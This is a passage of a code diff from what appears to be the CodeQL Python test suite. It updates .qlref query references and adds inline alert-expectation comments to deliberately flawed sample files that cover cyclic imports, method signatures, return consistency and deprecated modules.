a/python/ql/test/query-tests/Expressions/super/test.py +++ b/python/ql/test/query-tests/Expressions/super/test.py @@ -7,7 +7,7 @@ class MyDict(dict): class NotMyDict(object): def f(self): - super(MyDict, self).f() + super(MyDict, self).f() # $ Alert #Splitting PY2 = sys.version_info[0] == 2 diff --git a/python/ql/test/query-tests/Functions/ModificationOfParameterWithDefault/ModificationOfParameterWithDefault.qlref b/python/ql/test/query-tests/Functions/ModificationOfParameterWithDefault/ModificationOfParameterWithDefault.qlref index 8c4044e8feeb..e8937358e32f 100644 --- a/python/ql/test/query-tests/Functions/ModificationOfParameterWithDefault/ModificationOfParameterWithDefault.qlref +++ b/python/ql/test/query-tests/Functions/ModificationOfParameterWithDefault/ModificationOfParameterWithDefault.qlref @@ -1 +1 @@ -Functions/ModificationOfParameterWithDefault.ql +query: Functions/ModificationOfParameterWithDefault.ql diff --git a/python/ql/test/query-tests/Functions/general/DeprecatedSliceMethod.qlref b/python/ql/test/query-tests/Functions/general/DeprecatedSliceMethod.qlref index c38b8d1f7619..3043411c1ce4 100644 --- a/python/ql/test/query-tests/Functions/general/DeprecatedSliceMethod.qlref +++ b/python/ql/test/query-tests/Functions/general/DeprecatedSliceMethod.qlref @@ -1 +1,2 @@ -Functions/DeprecatedSliceMethod.ql \ No newline at end of file +query: Functions/DeprecatedSliceMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/general/ExplicitReturnInInit.qlref b/python/ql/test/query-tests/Functions/general/ExplicitReturnInInit.qlref index a23550c48650..df13334dcbf5 100644 --- a/python/ql/test/query-tests/Functions/general/ExplicitReturnInInit.qlref +++ b/python/ql/test/query-tests/Functions/general/ExplicitReturnInInit.qlref @@ -1 +1,2 @@ -Functions/ExplicitReturnInInit.ql \ No newline at end of file +query: Functions/ExplicitReturnInInit.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/general/InitIsGenerator.qlref b/python/ql/test/query-tests/Functions/general/InitIsGenerator.qlref index a3df140ff1e6..2662a7ca03a3 100644 --- a/python/ql/test/query-tests/Functions/general/InitIsGenerator.qlref +++ b/python/ql/test/query-tests/Functions/general/InitIsGenerator.qlref @@ -1 +1,2 @@ -Functions/InitIsGenerator.ql \ No newline at end of file +query: Functions/InitIsGenerator.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/general/IterReturnsNonIterator.qlref b/python/ql/test/query-tests/Functions/general/IterReturnsNonIterator.qlref index 3d0965f7b115..14655b261d42 100644 --- a/python/ql/test/query-tests/Functions/general/IterReturnsNonIterator.qlref +++ b/python/ql/test/query-tests/Functions/general/IterReturnsNonIterator.qlref @@ -1 +1 @@ -Functions/IterReturnsNonIterator.ql +query: Functions/IterReturnsNonIterator.ql diff --git a/python/ql/test/query-tests/Functions/general/OverlyComplexDelMethod.qlref b/python/ql/test/query-tests/Functions/general/OverlyComplexDelMethod.qlref index 601501aac303..90dba842c0e7 100644 --- a/python/ql/test/query-tests/Functions/general/OverlyComplexDelMethod.qlref +++ b/python/ql/test/query-tests/Functions/general/OverlyComplexDelMethod.qlref @@ -1 +1,2 @@ -Functions/OverlyComplexDelMethod.ql +query: Functions/OverlyComplexDelMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/general/SignatureOverriddenMethod.qlref b/python/ql/test/query-tests/Functions/general/SignatureOverriddenMethod.qlref index a306477b3b48..5470a05e0e41 100644 --- a/python/ql/test/query-tests/Functions/general/SignatureOverriddenMethod.qlref +++ b/python/ql/test/query-tests/Functions/general/SignatureOverriddenMethod.qlref @@ -1 +1,2 @@ -Functions/SignatureOverriddenMethod.ql +query: Functions/SignatureOverriddenMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/general/SignatureSpecialMethods.qlref b/python/ql/test/query-tests/Functions/general/SignatureSpecialMethods.qlref index bc1b29b6c0d0..ab188ef5bc28 100644 --- a/python/ql/test/query-tests/Functions/general/SignatureSpecialMethods.qlref +++ b/python/ql/test/query-tests/Functions/general/SignatureSpecialMethods.qlref @@ -1 +1,2 @@ -Functions/SignatureSpecialMethods.ql \ No newline at end of file +query: Functions/SignatureSpecialMethods.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/general/explicit_return_in_init.py b/python/ql/test/query-tests/Functions/general/explicit_return_in_init.py index 47a2933ad6ef..9024b13aa786 100644 --- a/python/ql/test/query-tests/Functions/general/explicit_return_in_init.py +++ b/python/ql/test/query-tests/Functions/general/explicit_return_in_init.py @@ -1,7 +1,7 @@ class ExplicitReturnInInit(object): def __init__(self): - return self + return self # $ Alert[py/explicit-return-in-init] # These are OK class ExplicitReturnNoneInInit(object): @@ -29,7 +29,7 @@ def __init__(self): class InitIsGenerator(object): - def __init__(self): + def __init__(self): # $ Alert[py/init-method-is-generator] yield self # OK as it returns result of a call to super().__init__() @@ -99,4 +99,4 @@ def __init__(self, b): p = procedure_implicit_none() else: p = not_ok - return p() + return p() # $ Alert[py/explicit-return-in-init] diff --git a/python/ql/test/query-tests/Functions/general/functions_test.py b/python/ql/test/query-tests/Functions/general/functions_test.py index 741599abd5b0..a306ef8ccc82 100644 --- a/python/ql/test/query-tests/Functions/general/functions_test.py +++ b/python/ql/test/query-tests/Functions/general/functions_test.py @@ -92,13 +92,13 @@ def ok_to_ignore(): class DeprecatedSliceMethods(object): - def __getslice__(self, start, stop): + def __getslice__(self, start, stop): # $ Alert[py/deprecated-slice-method] pass - def __setslice__(self, start, stop, value): + def __setslice__(self, start, stop, value): # $ Alert[py/deprecated-slice-method] pass - def __delslice__(self, start, stop): + def __delslice__(self, start, stop): # $ Alert[py/deprecated-slice-method] pass diff --git a/python/ql/test/query-tests/Functions/general/om_test.py b/python/ql/test/query-tests/Functions/general/om_test.py index 959ed6bfe348..edaa81bd0628 100644 --- a/python/ql/test/query-tests/Functions/general/om_test.py +++ b/python/ql/test/query-tests/Functions/general/om_test.py @@ -29,10 +29,10 @@ def ok1(self, arg1, arg2 = 2): def ok2(self, arg1, arg2 = 2, arg3 = 3): return arg1, arg2, arg3 - def grossly_wrong1(self, arg1): + def grossly_wrong1(self, arg1): # $ Alert[py/inheritance/signature-mismatch] return arg1 - def grossly_wrong2(self, arg1, arg2, arg3): + def grossly_wrong2(self, arg1, arg2, arg3): # $ Alert[py/inheritance/signature-mismatch] return arg1, arg2, arg3 def strictly_wrong1(self, arg1): @@ -56,19 +56,19 @@ def __str__(self): class WrongSpecials(object): - def __div__(self, x, y): + def __div__(self, x, y): # $ Alert[py/special-method-wrong-signature] return self, x, y - def __mul__(self): + def __mul__(self): # $ Alert[py/special-method-wrong-signature] return self - def __neg__(self, other): + def __neg__(self, other): # $ Alert[py/special-method-wrong-signature] return self, other - def __exit__(self, arg0, arg1): + def __exit__(self, arg0, arg1): # $ Alert[py/special-method-wrong-signature] return arg0 == arg1 - def __repr__(): + def __repr__(): # $ Alert[py/special-method-wrong-signature] return "" def __add__(self, other="Unused default"): @@ -80,7 +80,7 @@ def __abs__(): class OKSpecials(object): - def __del__(): + def __del__(): # $ Alert[py/special-method-wrong-signature] state = some_state() def __del__(self): diff --git a/python/ql/test/query-tests/Functions/general/protocols.py b/python/ql/test/query-tests/Functions/general/protocols.py index dd12fc3ed40f..68f0aaf29c09 100644 --- a/python/ql/test/query-tests/Functions/general/protocols.py +++ b/python/ql/test/query-tests/Functions/general/protocols.py @@ -71,7 +71,7 @@ def __iter__(self): class MegaDel(object): - def __del__(self): + def __del__(self): # $ Alert[py/overly-complex-delete] a = self.x + self.y if a: print(a) diff --git a/python/ql/test/query-tests/Functions/iterators/IterReturnsNonSelf.qlref b/python/ql/test/query-tests/Functions/iterators/IterReturnsNonSelf.qlref index b806215d26c8..828fca864dae 100644 --- a/python/ql/test/query-tests/Functions/iterators/IterReturnsNonSelf.qlref +++ b/python/ql/test/query-tests/Functions/iterators/IterReturnsNonSelf.qlref @@ -1 +1,2 @@ -Functions/IterReturnsNonSelf.ql \ No newline at end of file +query: Functions/IterReturnsNonSelf.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/iterators/test.py b/python/ql/test/query-tests/Functions/iterators/test.py index ced389967e41..6244f5dc10b6 100644 --- a/python/ql/test/query-tests/Functions/iterators/test.py +++ b/python/ql/test/query-tests/Functions/iterators/test.py @@ -2,7 +2,7 @@ class Bad1: def __next__(self): return 0 - def __iter__(self): # BAD: Iter does not return self + def __iter__(self): # BAD: Iter does not return self # $ Alert yield 0 class Good1: @@ -48,6 +48,6 @@ def __next__(self): self._it = iter(self) return next(self._it) - def __iter__(self): # SPURIOUS, GOOD: implementation of next ensures the iterator is equivalent to the one returned by iter, but this is not detected. + def __iter__(self): # SPURIOUS, GOOD: implementation of next ensures the iterator is equivalent to the one returned by iter, but this is not detected. # $ Alert yield 0 yield 0 \ No newline at end of file diff --git a/python/ql/test/query-tests/Functions/overriding/IncorrectlyOverriddenMethod.qlref b/python/ql/test/query-tests/Functions/overriding/IncorrectlyOverriddenMethod.qlref index d1637c1f1d37..cc2a5f9f73df 100644 --- a/python/ql/test/query-tests/Functions/overriding/IncorrectlyOverriddenMethod.qlref +++ b/python/ql/test/query-tests/Functions/overriding/IncorrectlyOverriddenMethod.qlref @@ -1 +1 @@ -Functions/IncorrectlyOverriddenMethod.ql \ No newline at end of file +query: Functions/IncorrectlyOverriddenMethod.ql diff --git a/python/ql/test/query-tests/Functions/overriding/IncorrectlySpecifiedOverriddenMethod.qlref b/python/ql/test/query-tests/Functions/overriding/IncorrectlySpecifiedOverriddenMethod.qlref index 8a07cb1297ea..958fcc629fff 100644 --- a/python/ql/test/query-tests/Functions/overriding/IncorrectlySpecifiedOverriddenMethod.qlref +++ b/python/ql/test/query-tests/Functions/overriding/IncorrectlySpecifiedOverriddenMethod.qlref @@ -1 +1 @@ -Functions/IncorrectlySpecifiedOverriddenMethod.ql \ No newline at end of file +query: Functions/IncorrectlySpecifiedOverriddenMethod.ql diff --git a/python/ql/test/query-tests/Functions/overriding/WrongNameForArgumentInCall.qlref b/python/ql/test/query-tests/Functions/overriding/WrongNameForArgumentInCall.qlref index 3599f204f55e..e68f904bc81c 100644 --- a/python/ql/test/query-tests/Functions/overriding/WrongNameForArgumentInCall.qlref +++ b/python/ql/test/query-tests/Functions/overriding/WrongNameForArgumentInCall.qlref @@ -1 +1 @@ -Expressions/WrongNameForArgumentInCall.ql \ No newline at end of file +query: Expressions/WrongNameForArgumentInCall.ql diff --git a/python/ql/test/query-tests/Functions/overriding/WrongNumberArgumentsInCall.qlref b/python/ql/test/query-tests/Functions/overriding/WrongNumberArgumentsInCall.qlref index 1bffe8f1cad4..ee0b95d7b07e 100644 --- a/python/ql/test/query-tests/Functions/overriding/WrongNumberArgumentsInCall.qlref +++ b/python/ql/test/query-tests/Functions/overriding/WrongNumberArgumentsInCall.qlref @@ -1 +1 @@ -Expressions/WrongNumberArgumentsInCall.ql \ No newline at end of file +query: Expressions/WrongNumberArgumentsInCall.ql diff --git a/python/ql/test/query-tests/Functions/return_values/ConsistentReturns.qlref b/python/ql/test/query-tests/Functions/return_values/ConsistentReturns.qlref index 0904074f25b4..6f10808f42bf 100644 --- a/python/ql/test/query-tests/Functions/return_values/ConsistentReturns.qlref +++ b/python/ql/test/query-tests/Functions/return_values/ConsistentReturns.qlref @@ -1 +1,2 @@ -Functions/ConsistentReturns.ql +query: Functions/ConsistentReturns.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/return_values/ReturnConsistentTupleSizes.qlref b/python/ql/test/query-tests/Functions/return_values/ReturnConsistentTupleSizes.qlref index c91661b33cf4..c7eaa3205b2e 100644 --- a/python/ql/test/query-tests/Functions/return_values/ReturnConsistentTupleSizes.qlref +++ b/python/ql/test/query-tests/Functions/return_values/ReturnConsistentTupleSizes.qlref @@ -1 +1,2 @@ -Functions/ReturnConsistentTupleSizes.ql +query: Functions/ReturnConsistentTupleSizes.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/return_values/ReturnValueIgnored.qlref b/python/ql/test/query-tests/Functions/return_values/ReturnValueIgnored.qlref index 61002533ef49..ded6bf8e609c 100644 --- a/python/ql/test/query-tests/Functions/return_values/ReturnValueIgnored.qlref +++ b/python/ql/test/query-tests/Functions/return_values/ReturnValueIgnored.qlref @@ -1 +1,2 @@ -Functions/ReturnValueIgnored.ql \ No newline at end of file +query: Functions/ReturnValueIgnored.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/return_values/UseImplicitNoneReturnValue.qlref b/python/ql/test/query-tests/Functions/return_values/UseImplicitNoneReturnValue.qlref index b23115e8950c..af71ab6388e2 100644 --- a/python/ql/test/query-tests/Functions/return_values/UseImplicitNoneReturnValue.qlref +++ b/python/ql/test/query-tests/Functions/return_values/UseImplicitNoneReturnValue.qlref @@ -1 +1,2 @@ -Functions/UseImplicitNoneReturnValue.ql \ No newline at end of file +query: Functions/UseImplicitNoneReturnValue.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/return_values/functions_test.py b/python/ql/test/query-tests/Functions/return_values/functions_test.py index 9f72a7fec600..ac87960e82e3 100644 --- a/python/ql/test/query-tests/Functions/return_values/functions_test.py +++ b/python/ql/test/query-tests/Functions/return_values/functions_test.py @@ -15,11 +15,11 @@ def ok2(x): else: return "Hi" -def cr1(x): +def cr1(x): # $ Alert[py/mixed-returns] if x: return 4 -def cr2(x): +def cr2(x): # $ Alert[py/mixed-returns] if x: return 4 else: @@ -74,7 +74,7 @@ def ok4(x): def use_implicit_return_value(arg): - x = do_nothing() + x = do_nothing() # $ Alert[py/procedure-return-value-used] return call_non_callable(arg) #The return in the lambda is OK as it is auto-generated @@ -156,9 +156,9 @@ def do_nothing(): def return_value_ignored(): - ok2() - ok4() - sorted([1,2]) + ok2() # $ Alert[py/ignored-return-value] + ok4() # $ Alert[py/ignored-return-value] + sorted([1,2]) # $ Alert[py/ignored-return-value] d = {} @@ -231,7 +231,7 @@ def mutli_return(arg): if arg: return do_something() else: - return do_nothing() + return do_nothing() # $ Alert[py/procedure-return-value-used] #Modification of parameter with default @@ -303,7 +303,7 @@ def foo(x): # Returning tuples with different sizes -def returning_different_tuple_sizes(x): +def returning_different_tuple_sizes(x): # $ Alert[py/mixed-tuple-returns] if x: return 1,2 else: @@ -333,7 +333,7 @@ def mismatched_multi_assign(x): return a,b -def ok_match(x): # FP +def ok_match(x): # FP # $ Alert[py/mixed-returns] match x: case True | 'true': return 0 @@ -341,7 +341,7 @@ def ok_match(x): # FP raise ValueError(x) -def ok_match2(x): # FP +def ok_match2(x): # FP # $ Alert[py/mixed-returns] match x: case None: return 0 diff --git a/python/ql/test/query-tests/Imports/PyCheckerTests/ImportandImportFrom.qlref b/python/ql/test/query-tests/Imports/PyCheckerTests/ImportandImportFrom.qlref index 3d50843db7eb..ed5a37e9d476 100644 --- a/python/ql/test/query-tests/Imports/PyCheckerTests/ImportandImportFrom.qlref +++ b/python/ql/test/query-tests/Imports/PyCheckerTests/ImportandImportFrom.qlref @@ -1 +1,2 @@ -Imports/ImportandImportFrom.ql +query: Imports/ImportandImportFrom.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/PyCheckerTests/ModuleImportsItself.qlref b/python/ql/test/query-tests/Imports/PyCheckerTests/ModuleImportsItself.qlref index e6bc27b30652..a5a25747abf6 100644 --- a/python/ql/test/query-tests/Imports/PyCheckerTests/ModuleImportsItself.qlref +++ b/python/ql/test/query-tests/Imports/PyCheckerTests/ModuleImportsItself.qlref @@ -1 +1,2 @@ -Imports/ModuleImportsItself.ql +query: Imports/ModuleImportsItself.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/PyCheckerTests/imports_test.py b/python/ql/test/query-tests/Imports/PyCheckerTests/imports_test.py index 6224c788c5eb..b8fa4a7ae375 100644 --- a/python/ql/test/query-tests/Imports/PyCheckerTests/imports_test.py +++ b/python/ql/test/query-tests/Imports/PyCheckerTests/imports_test.py @@ -1,11 +1,11 @@ #Import and import from -import test_module2 +import test_module2 # $ Alert[py/import-and-import-from] from test_module2 import func #Module imports itself -import imports_test +import imports_test # $ Alert[py/import-own-module] import pkg_ok import pkg_notok diff --git a/python/ql/test/query-tests/Imports/PyCheckerTests/pkg_notok/__init__.py b/python/ql/test/query-tests/Imports/PyCheckerTests/pkg_notok/__init__.py index b0e269d67a5c..ecfa5291dc30 100644 --- a/python/ql/test/query-tests/Imports/PyCheckerTests/pkg_notok/__init__.py +++ b/python/ql/test/query-tests/Imports/PyCheckerTests/pkg_notok/__init__.py @@ -1,7 +1,7 @@ class Foo(object): pass -import pkg_notok +import pkg_notok # $ Alert[py/import-and-import-from] Alert[py/import-own-module] # This import is a bit tricky. It will make `bar` available in as `pkg_notok.bar` as a # side effect (see https://docs.python.org/3/reference/import.html#submodules), but the @@ -9,6 +9,6 @@ class Foo(object): # module imports itself. import pkg_notok.bar -from pkg_notok import Foo -from pkg_notok import Foo as NotOkFoo -from pkg_notok import * +from pkg_notok import Foo # $ Alert[py/import-own-module] +from pkg_notok import Foo as NotOkFoo # $ Alert[py/import-own-module] +from pkg_notok import * # $ Alert[py/import-own-module] diff --git a/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/ModuleLevelCyclicImport.qlref b/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/ModuleLevelCyclicImport.qlref index 8b9bc8c123ae..e0e35483fedd 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/ModuleLevelCyclicImport.qlref +++ b/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/ModuleLevelCyclicImport.qlref @@ -1 +1,2 @@ -Imports/ModuleLevelCyclicImport.ql +query: Imports/ModuleLevelCyclicImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/module3.py b/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/module3.py index 83f5eda9557a..e3d76ff53a7a 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/module3.py +++ b/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/module3.py @@ -5,4 +5,4 @@ @dataclasses.dataclass() class Foo: - bars: typing.List[module4.Bar] + bars: typing.List[module4.Bar] # $ Alert diff --git a/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/module4.py b/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/module4.py index b6da208fbe34..e7864e9b6cab 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/module4.py +++ b/python/ql/test/query-tests/Imports/cyclic-module-annotations-fp/module4.py @@ -5,5 +5,5 @@ @dataclasses.dataclass() class Bar: - def is_in_foo(self, foo: module3.Foo): + def is_in_foo(self, foo: module3.Foo): # $ Alert return self in foo.bars diff --git a/python/ql/test/query-tests/Imports/cyclic-module-package-fp/false-negative/CyclicImport.qlref b/python/ql/test/query-tests/Imports/cyclic-module-package-fp/false-negative/CyclicImport.qlref index 814bba9fad6a..082797c92265 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module-package-fp/false-negative/CyclicImport.qlref +++ b/python/ql/test/query-tests/Imports/cyclic-module-package-fp/false-negative/CyclicImport.qlref @@ -1 +1,2 @@ -Imports/CyclicImport.ql \ No newline at end of file +query: Imports/CyclicImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/cyclic-module-package-fp/false-negative/ModuleLevelCyclicImport.qlref b/python/ql/test/query-tests/Imports/cyclic-module-package-fp/false-negative/ModuleLevelCyclicImport.qlref index 5119f8fdaae2..e0e35483fedd 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module-package-fp/false-negative/ModuleLevelCyclicImport.qlref +++ b/python/ql/test/query-tests/Imports/cyclic-module-package-fp/false-negative/ModuleLevelCyclicImport.qlref @@ -1 +1,2 @@ -Imports/ModuleLevelCyclicImport.ql \ No newline at end of file +query: Imports/ModuleLevelCyclicImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/cyclic-module-package-fp/true-negative/CyclicImport.qlref b/python/ql/test/query-tests/Imports/cyclic-module-package-fp/true-negative/CyclicImport.qlref index 814bba9fad6a..082797c92265 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module-package-fp/true-negative/CyclicImport.qlref +++ b/python/ql/test/query-tests/Imports/cyclic-module-package-fp/true-negative/CyclicImport.qlref @@ -1 +1,2 @@ -Imports/CyclicImport.ql \ No newline at end of file +query: Imports/CyclicImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/cyclic-module-package-fp/true-negative/ModuleLevelCyclicImport.qlref b/python/ql/test/query-tests/Imports/cyclic-module-package-fp/true-negative/ModuleLevelCyclicImport.qlref index 5119f8fdaae2..e0e35483fedd 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module-package-fp/true-negative/ModuleLevelCyclicImport.qlref +++ b/python/ql/test/query-tests/Imports/cyclic-module-package-fp/true-negative/ModuleLevelCyclicImport.qlref @@ -1 +1,2 @@ -Imports/ModuleLevelCyclicImport.ql \ No newline at end of file +query: Imports/ModuleLevelCyclicImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/cyclic-module/CyclicImport.qlref b/python/ql/test/query-tests/Imports/cyclic-module/CyclicImport.qlref index 814bba9fad6a..082797c92265 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module/CyclicImport.qlref +++ b/python/ql/test/query-tests/Imports/cyclic-module/CyclicImport.qlref @@ -1 +1,2 @@ -Imports/CyclicImport.ql \ No newline at end of file +query: Imports/CyclicImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/cyclic-module/ModuleLevelCyclicImport.qlref b/python/ql/test/query-tests/Imports/cyclic-module/ModuleLevelCyclicImport.qlref index 5119f8fdaae2..e0e35483fedd 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module/ModuleLevelCyclicImport.qlref +++ b/python/ql/test/query-tests/Imports/cyclic-module/ModuleLevelCyclicImport.qlref @@ -1 +1,2 @@ -Imports/ModuleLevelCyclicImport.ql \ No newline at end of file +query: Imports/ModuleLevelCyclicImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/cyclic-module/module1.py b/python/ql/test/query-tests/Imports/cyclic-module/module1.py index 55ef075e9e6e..e17ac87cdca2 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module/module1.py +++ b/python/ql/test/query-tests/Imports/cyclic-module/module1.py @@ -1,20 +1,20 @@ # potentially crashing cycles import module2 -import module3 +import module3 # $ Alert[py/cyclic-import] -a1 = module2.a2 +a1 = module2.a2 # $ Alert[py/unsafe-cyclic-import] b1 = 2 # bad style cycles -import module4 +import module4 # $ Alert[py/cyclic-import] def foo(): - import module5 + import module5 # $ Alert[py/cyclic-import] # okay, because some of the cycle is not top level -import module6 +import module6 # $ Alert[py/cyclic-import] # OK because this import occurs after relevant definition (a1) -import module8 +import module8 # $ Alert[py/cyclic-import] #OK because cycle is guarded by `if False:` from module10 import x diff --git a/python/ql/test/query-tests/Imports/cyclic-module/module2.py b/python/ql/test/query-tests/Imports/cyclic-module/module2.py index 333b8516adb3..81899e72e569 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module/module2.py +++ b/python/ql/test/query-tests/Imports/cyclic-module/module2.py @@ -1,4 +1,4 @@ import module1 # direct use -a2 = module1.a1 \ No newline at end of file +a2 = module1.a1 # $ Alert[py/unsafe-cyclic-import] \ No newline at end of file diff --git a/python/ql/test/query-tests/Imports/cyclic-module/module3.py b/python/ql/test/query-tests/Imports/cyclic-module/module3.py index 2180fb54a285..dd391cfcf5aa 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module/module3.py +++ b/python/ql/test/query-tests/Imports/cyclic-module/module3.py @@ -1,2 +1,2 @@ # use via import member -from module1 import a1 \ No newline at end of file +from module1 import a1 # $ Alert[py/unsafe-cyclic-import] \ No newline at end of file diff --git a/python/ql/test/query-tests/Imports/cyclic-module/module4.py b/python/ql/test/query-tests/Imports/cyclic-module/module4.py index 65db406bb451..790e92121d5d 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module/module4.py +++ b/python/ql/test/query-tests/Imports/cyclic-module/module4.py @@ -1 +1 @@ -import module1 \ No newline at end of file +import module1 # $ Alert[py/cyclic-import] \ No newline at end of file diff --git a/python/ql/test/query-tests/Imports/cyclic-module/module5.py b/python/ql/test/query-tests/Imports/cyclic-module/module5.py index 65db406bb451..790e92121d5d 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module/module5.py +++ b/python/ql/test/query-tests/Imports/cyclic-module/module5.py @@ -1 +1 @@ -import module1 \ No newline at end of file +import module1 # $ Alert[py/cyclic-import] \ No newline at end of file diff --git a/python/ql/test/query-tests/Imports/cyclic-module/module6.py b/python/ql/test/query-tests/Imports/cyclic-module/module6.py index 5a5fcd149ac6..df0376aceaa9 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module/module6.py +++ b/python/ql/test/query-tests/Imports/cyclic-module/module6.py @@ -1,2 +1,2 @@ def foo(): - import module7 \ No newline at end of file + import module7 # $ Alert[py/cyclic-import] \ No newline at end of file diff --git a/python/ql/test/query-tests/Imports/cyclic-module/module7.py b/python/ql/test/query-tests/Imports/cyclic-module/module7.py index d0b18ba5894d..6a961467bad7 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module/module7.py +++ b/python/ql/test/query-tests/Imports/cyclic-module/module7.py @@ -1 +1 @@ -from module1 import a1 \ No newline at end of file +from module1 import a1 # $ Alert[py/cyclic-import] \ No newline at end of file diff --git a/python/ql/test/query-tests/Imports/cyclic-module/module8.py b/python/ql/test/query-tests/Imports/cyclic-module/module8.py index 185ee214da83..8117f9a6f9c5 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module/module8.py +++ b/python/ql/test/query-tests/Imports/cyclic-module/module8.py @@ -1,4 +1,4 @@ -import module1 +import module1 # $ Alert[py/cyclic-import] class Foo(object): a = module1.a1 \ No newline at end of file diff --git a/python/ql/test/query-tests/Imports/cyclic-module/module9.py b/python/ql/test/query-tests/Imports/cyclic-module/module9.py index 06ab5b933058..b8dfb4e10a6d 100644 --- a/python/ql/test/query-tests/Imports/cyclic-module/module9.py +++ b/python/ql/test/query-tests/Imports/cyclic-module/module9.py @@ -1,6 +1,6 @@ x = 1 -import main +import main # $ Alert[py/cyclic-import] y = 2 \ No newline at end of file diff --git a/python/ql/test/query-tests/Imports/deprecated/DeprecatedModule.qlref b/python/ql/test/query-tests/Imports/deprecated/DeprecatedModule.qlref index 9f87b11d807c..93ed1e7b4be7 100644 --- a/python/ql/test/query-tests/Imports/deprecated/DeprecatedModule.qlref +++ b/python/ql/test/query-tests/Imports/deprecated/DeprecatedModule.qlref @@ -1 +1,2 @@ -Imports/DeprecatedModule.ql +query: Imports/DeprecatedModule.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/deprecated/test.py b/python/ql/test/query-tests/Imports/deprecated/test.py index ce70d29794eb..6cf11feb7824 100644 --- a/python/ql/test/query-tests/Imports/deprecated/test.py +++ b/python/ql/test/query-tests/Imports/deprecated/test.py @@ -1,11 +1,11 @@ # Some deprecated modules -import rfc822 -import posixfile +import rfc822 # $ Alert +import posixfile # $ Alert # We should only report a bad import once class Foo(object): def foo(self): - import md5 + import md5 # $ Alert # Backwards compatible code, should not report try: diff --git a/python/ql/test/query-tests/Imports/general/FromImportOfMutableAttribute.qlref b/python/ql/test/query-tests/Imports/general/FromImportOfMutableAttribute.qlref index 9353115309f8..302bb0895a6b 100644 --- a/python/ql/test/query-tests/Imports/general/FromImportOfMutableAttribute.qlref +++ b/python/ql/test/query-tests/Imports/general/FromImportOfMutableAttribute.qlref @@ -1 +1,2 @@ -Imports/FromImportOfMutableAttribute.ql \ No newline at end of file +query: Imports/FromImportOfMutableAttribute.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/general/ImportShadowedByLoopVar.qlref b/python/ql/test/query-tests/Imports/general/ImportShadowedByLoopVar.qlref index 3844f21922fb..d5b4aaa16938 100644 --- a/python/ql/test/query-tests/Imports/general/ImportShadowedByLoopVar.qlref +++ b/python/ql/test/query-tests/Imports/general/ImportShadowedByLoopVar.qlref @@ -1 +1,2 @@ -Imports/ImportShadowedByLoopVar.ql \ No newline at end of file +query: Imports/ImportShadowedByLoopVar.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/general/ImportStarUsed.qlref b/python/ql/test/query-tests/Imports/general/ImportStarUsed.qlref index 35f8bff3e5fc..099627be88cd 100644 --- a/python/ql/test/query-tests/Imports/general/ImportStarUsed.qlref +++ b/python/ql/test/query-tests/Imports/general/ImportStarUsed.qlref @@ -1 +1,2 @@ -Imports/ImportStarUsed.ql \ No newline at end of file +query: Imports/ImportStarUsed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Imports/general/Imports.qlref b/python/ql/test/query-tests/Imports/general/Imports.qlref index 6bcdb2d9b5fd..926c62f0a410 100644 